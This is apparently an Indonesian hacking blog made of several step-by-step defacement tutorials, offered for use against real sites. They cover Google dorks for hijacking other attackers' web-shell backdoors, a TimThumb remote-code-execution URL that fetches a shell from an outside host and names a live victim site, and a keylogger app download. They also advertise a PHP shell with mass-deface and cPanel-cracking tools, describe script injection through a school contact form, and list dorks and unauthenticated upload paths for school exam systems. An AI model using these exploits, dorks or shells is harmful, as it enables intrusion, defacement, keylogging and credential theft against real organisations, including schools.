Popular Post

Popular Posts

Recent post


Hallo, first post tutorial menikung shell backdoor orang, oke langsung ke tutorialnya aja :)





Dork :
  •        intitle:sh3ll ext:php "/public_html/"
  •        intitle:"IndoXploit" filetype:php 
  •        intitle:"IndoXploit" intext:"public_html" filetype:php
  •        intitle:"IndoXploit" intext:"mass deface" filetype:php
  •        intitle:"IndoXploit" intext:"mass delete" filetype:php
  •        intitle:"IndoXploit" intext:"config" filetype:php
  •        intitle:"IndoXploit" intext:"config" filetype:php
  •        intitle:"IndoXploit" intext:"fake root" filetype:php
  •        intitle:"IndoXploit" intext:"auto edit user" filetype:php
  •        intitle:"IndoXploit" intext:"Auto Edit Title WordPress" filetype:php
  •        intitle:"IndoXploit" intext:"WordPress Auto Deface" filetype:php
  •        intitle:"IndoXploit" intext:"WordPress Auto Deface V.2" filetype:php
  •        intitle:"IndoXploit" intext:"CPanel/FTP Auto Deface" filetype:php
  •        intitle:"IndoXploit" intext:"cpanel crack" filetype:php
  •        intitle:"IndoXploit" intext:"Adminer" filetype:php
  •        intitle:"IndoXploit" intext:"SMTP Grabber" filetype:php
  •        intitle:"IndoXploit" intext:"Zone-h" filetype:php
  •        intitle:"IndoXploit" intext:"CGI Telnet" filetype:php
  •        intitle:"IndoXploit" intext:"network" filetype:php
  •        intitle:"IndoXploit" intext:"K-RDP Shell " filetype:php
  •        intitle:"IndoXploit" intext:"newfile | newfolder" filetype:php
  •        inurl:"/wp-content/" intitle:"IndoXploit" filetype:php
  •        inurl:"/wp-content/" intitle:"b374k" filetype:php
  •        inurl:"/wp-content/" intitle:"b374k m1n1" filetype:php
  •        inurl:"/wp-content/" intitle:"Shell" filetype:php
  •        inurl:"/wp-content/" intitle:"Stupidc0de" filetype:php
  •        intitle:"1n73ction" filetype:php 
  •        intext:"Cpanel Cracker" filetype:php
  •        intext:"Current DIR: /home/" filetype:php
  •        intext:"IndoXploit" filetype:php
Pilih salah satu dork diatas
  • Kita Dorking di Google Engine dengan dork diatas



  • Kalo udah ketemu, terserah lo mau apain juga tuh web

Sekian dulu tutor tykung menikungnya hhe, bye :D

Hello ^^ kali ini saya akan share Cara deface dengan Exploit Timthumb V1.XX RCE
yuk langsung saja ke tutorialnya,


Dork : inurl:/timthumb.php 
atau bisa kalian pake dengan List Dork Timthumb V1.XX RCE disini
Exploit : timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php


Disini saya punya live targetnya => http://cityfordhcm.com/timthumb.php
Untuk ciri ciri web vuln rce timthumb seperti gambar dibawah ini .

jika sudah menemukan website yang seperti itu kita langsung saja exploit seperti ini 
http://cityfordhcm.com/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
nanti akan keluar seperti gambar dibawah ini atau seperti ini

Unable to open image : /home/cityfordhcm/public_html/cache/external_66b043a706b2265ea1b66330089ac2a0.php
Query String : src=http://flickr.com.tukangpompajakarta.com/shell.php
TimThumb version : 1.30


Untuk akses shell di timthumb bisa di liat di unable to open image  berati di http://cityfordhcm.com/cache/external_66b043a706b2265ea1b66330089ac2a0.php 
Setelah itu kalian buka http://cityfordhcm.com/cache/dedot.php untuk upload shell :D

Mungkin sekian dulu  dari saya mengenai artikel Cara deface dengan Exploit Timthumb V1.XX RCE semoga bermanfaat.

Hackers KeyLogger Adalah Aplikasi Keylogger Yang Merekam Semua Data Yang Diketik Di Keyboard Tersebut
Size Hackers KeyLogger : 1.99MB
Link Download : Here
Cara Mengaktifkan :
  • Download Aplikasinya Lalu Install & Buka, Lalu Klik Seperti Ini
  • Pilih Choose Keyboard
  • Switch On Hack Keyboard
  • Kembali Lagi Ke Aplikasi Hackers KeyLogger
  • Pilih Hack Keyboard
  • Tekan Tombol Yang Merah Hingga Hijau
  • Dan Keyloggernya Sudah Jalan :)
Cara Buka Lognya :
  • Buka Aplikasi KeyLoggernya
  • Klik Open Application
  • Klik Typed Data
  • Done
Selamat Mencoba

Label: 


Shell ini gua buat dari Beberapa tools shell yang sudah ada sebelumnya seperti dari shell IndoXploit - Xaisyndicate - Ustadcage48 - Mrxbarakuda :v

Alasan : karna banyak sekali shell backdoor yg support pc tapi gak buat android,kalo di pakek di android ya otomatis harus zoom in - zoom out kadang kadang suka salah pencet,pencet rename malah kepencet delete :'v

ya pokok nya shell ini gua buat udah semaksimal mungkin,jadi maaf kalo seandainya masih banyak kekurangan di sana sini,yang pasti shell ini 100% Smooth udah gua pakek di Chrome dan Uc Browser,Kalo mau yg lebih smooth gua saranin pkek chrome tapi terserah lu dah :v

Halaman Login


Tools

- Adminer
- Command
- Jumping
- Symlink
- Symlink Python
- Mass Deface
- Config v2
- Config Grabber
- Auto edit user
- Auto edit user WP
- Cpanel Crack
- Safety
- Zone-H

Penampakan nya


NO LOGGER ( Gak percaya Obrak Abrik sendiri Shell nya) 

Link Download : https://pastebin.com/NqkMU1CE / Pass Default : D704T

assalamualaikum wr.wb

kali ini saya akan membagikan tutorial deface metode JSO

bahan bahannya :

-SCRIPT JSO

-KESABARAN

-APK BROWSER SEPERTI CHROME

– DORK : aplikasi sistem informasi kelulusan

PERTAMA TAMA KITA DORKING DULU DI CHROME “aplikasi sistem informasi kelulusan”

PILIH TARGET KALIAN

KALIAN PILIH “HUBUNGI KAMI”

DI KOLOM NAMA ISI NICK KALIAN,DI EMAIL ISI NGASAL AJA CONTOH : noahklak@gmail.com,DI KOLOM PESAN ISI DENGAN SCRIPT JSO KALIAN CONTOH :

NAH KALIAN BISA LIHATKAN, KALAU SUDAH KALIAN KLICK KIRIM PESAN

JIKA ADA TULISAN DATA BERHASIL DI KIRIM KITA TINGGAL PANGGIL SCRIPT JSO KITA TADI DENGAN CARA : http://website.sch.id/kelulusanxyz-a/admin/hubungi.php

TINGGAL KALIAN ENTER DAN DONE

DAN SELESAI

“SELAMAT MENCOBA^_^”

assalamualaikum wr wb…
welcombek mek
kali ini gw bakal kasih tutorial deface poc dns hijacking

bahan” yang kalian butuhkan :
1.sc deface
2.kopi buat santuy
3.apk browser gw saranin pakek crhome ye

langsung aja gass
kita masuk dulu web

trus kalian login pakek akun google kalian

nah kalau dah masuk nanti pasti ada iklannya suruh masukin password apalah itu…kalian pilih (×) trus sampai laman biasa

kalian pilih domain manager

abis itu kalian pilih buat domain gratis/add free domain

nah di aitu kalian buat domain kalian sendiri kalai udah buat…

kalian cari file manager pilih domain kalian..

dan pilih upload script deface kalian

kalau udh upload kalian copy link website kalian dan kalian pastekan di web baru

NOTE : KALAU MAU TEBAS INDEXNYA KALIAN UBAH NAMA SCRIPT DEFACE KALIAN JADI “index.php”

Assalamualaikum Brother... :v


Kali Ini gw akan Ngasih Tutor, Gimana sih cara Deface CBT atau bisa dibilang Computer Based Test.. Nahh nih gw kasih sedikit tutor buat kalian semua....
yang pertama siapin Dork

Dork :

inurl:/login.php intitle:ujian online
inurl:/cbt/login.php site:sch.id
inurl:/login.php intitle:cbt beesmart
inurl:/login.php inurl:/cbt
inurl:/login.php intitle:ujian sekolah
inurl:/login.php intitle:ujian sma
inurl:/login.php intitle:cbt pintersmart
inurl:/login.php intitle:ujian pintersmart

Exploit :

/panel/pages/upload-file.php
/panel/pages/upload_video.php
/panel/pages/upload_audio.php
/panel/pages/upload_gambar.php
/panel/pages/upload-file.php
/panel/pages/upload-fotosiswa.php
/panel/pages/upload-banner.php
/panel/pages/upload-logo.php

CSRF : Klik Disini 

Pertama kita dorking dulu...



Pilih Salah satu Target Yak...


 
Nahhh.... Tinggal tambahin Exploit ke website nya :v


Kalo Blank putih, Berarti VULN


Langsung Copy aja URL ke CSRF tadi, Untuk Post File kita Pilih uploadfile , uploadfile2 , uploadfile3 (pilih salah satu aja )


 kalo dah, Kunci Targetnya dan Pilih Shell kamu :v


 Kalo ada tilisan succes dipojok atas, itu berarti Sukses upload shell




Cara Panggil Shell kek gini,

 /images/namashell.php
 /pictures/namashell.php
/video/namashell.php

(tambahin dibelakang path) 


Nahh... Udahkan, terserah mau diapain...
oke Segini aja tutorialnya.. Kalo ada kesalahan, maaf. namanya juga manusia (banyak salah) :v

See You Next Time yaa Gaesss

Wassalamualaikum.

- Copyright © Blog ./G1L4N6_ST86 - Devil Survivor 2 - Powered by Blogger - Designed by ./G1L4N6_ST86 -